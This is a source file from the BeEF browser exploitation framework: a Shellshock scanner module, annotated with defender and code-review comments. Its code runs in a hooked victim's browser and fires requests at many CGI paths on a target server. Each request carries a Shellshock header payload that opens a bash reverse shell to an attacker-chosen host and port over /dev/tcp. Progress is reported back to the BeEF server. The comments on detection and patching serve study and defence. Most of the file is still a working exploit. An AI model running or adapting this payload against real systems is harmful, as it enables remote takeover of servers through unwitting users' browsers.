beef/modules/exploits/shell_shock_scanner/command.js
//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// BeEF command module (ERB template rendered server-side, then executed in the hooked browser).
// Behaviour, as visible here: iterates a list of CGI paths against a single target host and
// issues one XHR per path with a Shellshock-style string in the "Accept" header, reporting
// start/finish back to the BeEF server via beef.net.send().
//
// Defender notes:
//  - Every request from this module carries a request header whose value begins with "() {" —
//    that prefix is the classic Shellshock indicator and is a straightforward WAF/IDS match on
//    any header, not just User-Agent.
//  - The requests originate from the hooked browser, not from the BeEF server, so the source
//    IP in the target's logs is the victim workstation; correlate with the beef.net.send()
//    beacons to "<%= @command_url %>" to attribute the activity.
//  - Mitigation for the target side is patching bash; this module does not check for the
//    vulnerability, it only fires the payload at each path and logs any HTTP 200 it can read.
beef.execute(function() {
// All of these are substituted by ERB from the module options at render time.
var rproto = '<%= @rproto %>';
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
// Base URL; each CGI path from the list is appended to it.
var target = rproto + '://' + rhost + ':' + rport;
var method = '<%= @method %>';
// NOTE: interpolated as a string ('<%= @wait %>'); arithmetic below relies on implicit coercion.
var wait = '<%= @wait %>';
// Assigned without `var` → implicit global (same for `cleanup` below). The string passed to
// setTimeout at the end of this module depends on `cleanup` being global.
get_cgi = function(uri) {
try {
// Shellshock-style header value; the "() { :;};" prefix is what detection signatures key on.
var payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1 &";
var xhr = new XMLHttpRequest();
// Asynchronous request; the method is whatever @method was set to.
xhr.open(method, target+uri, true);
// No-op onload handler; all response handling is in onreadystatechange.
xhr.onload = function () {
};
xhr.onreadystatechange = function () {
// Only a readable HTTP 200 is logged; the request itself is sent regardless of whether
// a response can be read. Uses loose equality (==) rather than ===.
if (xhr.readyState == 4 && xhr.status == 200) {
beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);
}
}
// The payload travels in the Accept header.
xhr.setRequestHeader("Accept", payload);
xhr.send(null);
} catch (e){
// Errors (e.g. a disallowed method or malformed URL) are only logged client-side.
beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);
}
}
// add scripts to queue
// The ERB block below runs on the BeEF server when the module is rendered: it reads the
// module's shocker-cgi_list file, drops lines starting with '#', and emits the remaining
// paths as a shuffled JavaScript array literal. Randomised order means the target sees the
// paths in a different sequence on every run. `chomp!` returns nil when there was no trailing
// newline to remove, which the nil? check covers.
var requests = new Array(
<%=
scripts = []
File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
file_handle.each_line do |line|
uri = line.chomp!
next if uri =~ /^#/
next if uri.nil?
scripts << "'#{uri}'"
end
end
scripts.shuffle.join(",\n")
%>
);
// process queue
// Progress is reported both to the local debug log and back to the BeEF server (command_url).
beef.debug("[command #<%= @command_id %>] Starting Shellshock scan of "+target+" ("+requests.length+" URLs)");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan of "+target+" ("+requests.length+" URLs)");
// Overall deadline in seconds: one `wait` interval per path plus a 10 s grace period.
var timeout = wait * requests.length + 10;
// Fires every `wait` seconds, consuming one path per tick from the end of the array, and
// calls cleanup() once the queue is empty.
var handle = setInterval(function() {
if (requests.length > 0) {
get_cgi(requests.pop());
} else cleanup();
}, wait*1000);
// clean up
// Idempotent via the `handle` guard: both the interval (queue drained) and the global
// setTimeout (deadline reached) may call this; only the first caller stops the timer and
// sends the completion beacon. Implicit global, like get_cgi.
cleanup = function() {
if (handle) {
beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
clearInterval(handle);
handle = 0;
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
}
}
// Deadline fallback. NOTE(review): a string argument to setTimeout is evaluated as code
// (eval-style); passing the function reference (`setTimeout(cleanup, ...)`) would be the
// conventional form and would not depend on `cleanup` being a global.
setTimeout("cleanup();", timeout*1000);
});